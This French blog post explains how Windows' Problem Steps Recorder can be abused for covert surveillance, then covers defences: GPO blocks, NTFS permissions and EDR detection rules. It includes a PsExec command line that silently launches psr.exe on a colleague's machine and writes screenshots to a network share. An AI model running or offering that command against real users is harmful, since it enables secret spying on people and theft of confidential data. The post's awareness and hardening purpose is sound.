Détournement du PSR (Problem Steps Recorder) : l’outil d’enregistrement Windows qui devient espion

Windows intègre un utilitaire ultra pratique pour le support technique : le Problem Steps Recorder (PSR), aussi appelé Enregistreur d’actions utilisateur. Conçu pour capturer pas à pas les interactions d’un utilisateur afin de diagnostiquer un problème, il peut aussi facilement devenir un outil d’espionnage à distance.

PSR, un outil simple… et dangereux entre de mauvaises mains

PSR enregistre automatiquement :

  • Les clics souris
  • Les interactions clavier (partiellement)
  • Les captures d’écran à chaque étape

Pour générer un rapport visuel clair, exporté en archive .zip, qu’on peut consulter dans un navigateur.

Mais ce qui est moins connu, c’est que PSR peut être piloté en ligne de commande, avec des options permettant de désactiver l’interface graphique et d’enregistrer directement sur un chemin réseau.

Quelques options intéressantes de PSR

  • /start /output <chemin> : démarre l’enregistrement et envoie le rapport à l’emplacement donné.
  • /stop : arrête l’enregistrement.
  • /sc : capture d’écran à chaque étape.
  • /gui 0 : désactive l’interface graphique, donc invisible pour l’utilisateur.

Avec ces options, il devient très simple de lancer PSR discrètement, sans que l’utilisateur s’en aperçoive.

Un scénario d’espionnage simple avec PsExec

Imagine un administrateur réseau un peu trop curieux (ou un attaquant interne) qui utilise l’outil PsExec (outil Microsoft Sysinternals permettant d’exécuter des commandes à distance) pour lancer PSR sur la machine d’un collègue, à son insu.

powershell
psexec \\nommachine C:\Windows\System32\psr.exe /start /gui 0 /output \\serveur\partage\rapport.zip

L’enregistrement tourne alors en fond, capturant chaque clic et chaque écran affiché, et les envoie automatiquement sur un partage réseau accessible à l’espion.

Après un moment, il suffit de stopper la session :

powershell
psr.exe /stop

Et voilà, un rapport complet, détaillé, silencieux… le rêve du voyeur numérique.

Pourquoi c’est inquiétant ?

  • Invisible : pas d’interface pour alerter l’utilisateur.
  • Automatisable : peut être lancé et stoppé à distance.
  • Données sensibles : captures d’écran de documents confidentiels, mails, identifiants affichés, etc.
  • Facilité : pas besoin d’installer de logiciel espion tiers, PSR est déjà présent sur toutes les machines Windows.

Comment se prémunir ?

  • Surveiller les processus actifs (psr.exe) et alertes sur démarrage anormal.
  • Restreindre l’usage de PsExec et autres outils à distance aux seuls administrateurs de confiance.
  • Restreindre l’accès à PSR via les stratégies de groupe (GPO) en entreprise.
  • Sensibiliser les utilisateurs et auditer régulièrement les logs d’activité.
  • Utiliser des solutions de détection d’intrusions internes (EDR) pour détecter ce type de comportements anormaux.

Guide pour bloquer ou restreindre l’utilisation de PSR

a) Bloquer PSR via les Stratégies de Groupe (GPO)

  1. Ouvre l’éditeur de gestion des stratégies de groupe (gpedit.msc).
  2. Navigue vers :
    Configuration utilisateur > Modèles d'administration > Système
  3. Cherche une stratégie nommée « Ne pas exécuter les applications Windows spécifiées ».
  4. Active-la, puis dans la liste des applications interdites, ajoute :
    psr.exe

Cela empêchera les utilisateurs d’exécuter PSR.


b) Supprimer ou renommer l’exécutable PSR

Pour les environnements plus restrictifs, tu peux :

  • Renommer ou déplacer psr.exe situé dans :
    C:\Windows\System32\psr.exe
    (Attention, cette méthode peut être contournée par un utilisateur admin.)
  • Supprimer le fichier (non recommandé car modification système).

c) Limiter l’accès avec permissions NTFS

  1. Sur le fichier psr.exe, clique droit > Propriétés > Sécurité.
  2. Retire les droits d’exécution pour les utilisateurs non-administrateurs.

d) Surveiller et alerter via outils EDR/antivirus

  • Configure des règles pour détecter le lancement de psr.exe avec les options /start /gui 0.
  • Alerte automatique en cas d’exécution suspecte.

e) Sensibilisation et bonnes pratiques

  • Informer les utilisateurs que PSR ne doit être utilisé qu’avec accord.
  • Former les administrateurs pour qu’ils n’utilisent pas cet outil à des fins non éthiques.

Conclusion

Le PSR est un outil génial pour le support technique, mais comme toujours, dès qu’un outil est puissant et simple, il peut être détourné pour espionner. Microsoft a beau vouloir aider, la puissance donnée entre de mauvaises mains peut vite devenir un cauchemar.

Si tu gères un parc Windows, garde un œil sur PSR, car c’est un cheval de Troie numérique bien caché, capable de faire parler tes utilisateurs… sans qu’ils le sachent.

cedetrick

👤 Présentation personnelle Né en 1970, je suis un passionné d'informatique depuis mon tout premier ZX81. Curieux de nature, j'ai toujours aimé explorer, démonter, comprendre - et parfois même réparer - tout ce qui touche au numérique. Officiellement vintage, j'ai traversé les époques technologiques : du TI99/4A, CPC6128, aux calculatrices HP 48G / GX / 40G et TI92, sans oublier l'arrivée des PCs, que j'ai suivie de près, du i386 jusqu'aux configurations modernes. 💻 Je reste un utilisateur convaincu de Windows, même si je m'essaie régulièrement à Linux pour sortir de ma zone de confort. Le monde Mac ? Disons qu'on ne s'est jamais vraiment croisés. 🎮 Côté consoles, c'est toute une vie de gaming (ou presque) : de l'Atari (avant même qu'il s'appelle 2600) à la SNES, puis les PS1 et PS2 de mon petit frère - que je formais au passage à Doom, Wolfenstein, et aux assemblages Lego sur PC. Aujourd'hui, même si j'ai une PS3, PS4 et Switch, le temps me manque pour vraiment en profiter... mais elles sont là, fidèles, comme un musée interactif prêt à s'allumer ! 🎥📚 Passionné de cinéma, de séries, et de lecture, j'aime aussi simplement découvrir, apprendre et m'émerveiller. Car au fond, ce qui m'anime depuis toujours, c'est cette curiosité insatiable, ce plaisir de creuser un sujet jusqu'à en comprendre les rouages.